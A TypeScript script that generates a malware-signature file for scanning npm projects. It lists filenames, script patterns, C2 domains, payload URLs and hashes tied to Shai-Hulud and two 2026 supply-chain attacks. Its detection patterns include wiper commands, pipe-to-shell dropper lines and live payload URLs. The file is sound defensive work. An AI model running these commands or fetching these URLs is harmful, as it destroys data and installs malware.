import * as fs from 'fs';
import * as path from 'path';

/**
 * This script generates the signatures file.
 * Signatures are stored in plain text to ensure transparency.
 */

// THE LIST OF MALICIOUS STRINGS TO DETECT
// These are the "signatures" of Shai-Hulud, the Axios attack, and other malware.
const SIGNATURES = {
    // Malicious filenames
    filenames: [
        // Shai-Hulud 2.0
        'setup_bun.js',
        'bun_environment.js',
        'shai-hulud.js',
        'worm.js',
        // Axios supply chain attack (March 2026)
        'setup.js',
        'com.apple.act.mond',
        'ld.py',
        '6202033.ps1',
        '6202033.vbs',
        // TanStack wave 4 (May 2026 - GHSA-g7cv-rxg3-hmpx)
        'router_init.js',
        'tanstack_runner.js',
        'router_runtime.js',
        'gh-token-monitor.sh',
        'gh-token-monitor.service',
        'com.user.gh-token-monitor.plist',
    ],
    // Malicious string patterns in scripts
    scriptPatterns: [
        // Shai-Hulud 2.0
        'Shai-Hulud',
        'The Second Coming',
        'shred -uvz -n 1', // Linux wiper
        'del /F /Q /S "%USERPROFILE%*"', // Windows wiper
        'irm bun.sh/install.ps1|iex', // PowerShell dropper
        'curl -sL http://malicious.com | bash', // Generic dropper
        'node setup_bun.js', // Shai Hulud specific
        // Axios supply chain attack (March 2026)
        'plain-crypto-js', // Phantom dependency name
        'sfrclak.com', // C2 domain
        'calltan.com', // Related C2 domain
        'callnrwise.com', // Related C2 domain
        'OrDeR_7077', // XOR cipher key
        '142.11.206.73', // C2 IP
        'node setup.js', // Axios dropper execution
        'com.apple.act.mond', // macOS RAT disguised as Apple daemon
        'packages.npm.org/product', // Beacon POST body identifier
        'mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)', // Spoofed User-Agent
        // TanStack wave 4 (May 2026 - GHSA-g7cv-rxg3-hmpx)
        'EveryBoiWeBuildIsAWormyBoi', // Campaign identifier string
        'IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner', // Dead-man's switch payload trigger
        'OhNoWhatsGoingOnWithGitHub', // Token-recovery magic string in attacker commits
        'svksjrhjkcejg', // Unique PBKDF2 salt for this wave's payload obfuscation
        '0c0e873033875f1bc471eda37e3b9d0f9b89bd41a4bbb4f86746caa2186c40aa', // Hardcoded PBKDF2 master key
        'bun run tanstack_runner.js', // Prepare-script invocation
        'tanstack_runner.js', // Secondary runner file referenced in scripts
        'router_init.js', // Primary 2.3 MB payload file referenced in installs
        '79ac49eedf774dd4b0cfa308722bc463cfe5885c', // Malicious orphan commit pinned via optionalDependencies
        'github:tanstack/router#79ac49eedf', // Truncated form of the malicious git ref
        'filev2.getsession.org', // Session network exfil endpoint
        'api.masscan.cloud', // C2 domain
        'git-tanstack.com', // C2 domain impersonating TanStack
        'litter.catbox.moe/h8nc9u.js', // Second-stage payload URL
        'litter.catbox.moe/7rrc6l.mjs', // Second-stage payload URL
        '__DAEMONIZED', // Daemonization env var sentinel
        'dependabout/', // Branch-name pattern impersonating Dependabot
        'claude@users.noreply.github.com', // Spoofed commit author used by the worm
    ],
    // Axios attack stage-2 payload hashes (SHA-256)
    axiosMalwareHashes: [
        '92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a', // macOS RAT: com.apple.act.mond
        '617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101', // Windows RAT: 6202033.ps1
        'fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf', // Linux RAT: ld.py
    ],
    // TanStack wave 4 payload hashes (SHA-256)
    tanstackMalwareHashes: [
        'ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c', // router_init.js (2.3 MB primary payload)
        '2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96', // tanstack_runner.js (secondary runner)
    ],
    // Known-malicious git refs smuggled via dependencies/optionalDependencies.
    // Both full and truncated forms appear in published manifests.
    knownBadGitRefs: [
        '79ac49eedf774dd4b0cfa308722bc463cfe5885c', // TanStack wave 4 orphan commit (May 2026)
        '79ac49eedf', // truncated form
    ],
};

function generateFileContent() {
    return `/**
 * AUTO-GENERATED FILE - DO NOT EDIT
 * Generated by scripts/encrypt-signatures.ts
 *
 * This file contains signatures for detecting malware.
 * They are stored in plain text for transparency.
 */

export const MALWARE_FILENAMES = ${JSON.stringify(SIGNATURES.filenames)};
export const MALWARE_PATTERNS = ${JSON.stringify(SIGNATURES.scriptPatterns)};
export const KNOWN_BAD_GIT_REFS = ${JSON.stringify(SIGNATURES.knownBadGitRefs)};

// Axios attack stage-2 payload hashes (SHA-256)
export const AXIOS_MALWARE_HASHES = new Set(${JSON.stringify(SIGNATURES.axiosMalwareHashes)});

// TanStack wave 4 payload hashes (SHA-256) - GHSA-g7cv-rxg3-hmpx
export const TANSTACK_MALWARE_HASHES = new Set(${JSON.stringify(SIGNATURES.tanstackMalwareHashes)});
`;
}

const outputPath = path.join(__dirname, '..', 'src', 'generated', 'signatures.ts');
const outputDir = path.dirname(outputPath);

if (!fs.existsSync(outputDir)) {
    fs.mkdirSync(outputDir, { recursive: true });
}

fs.writeFileSync(outputPath, generateFileContent());
console.log(`✅ Generated signatures at ${outputPath}`);
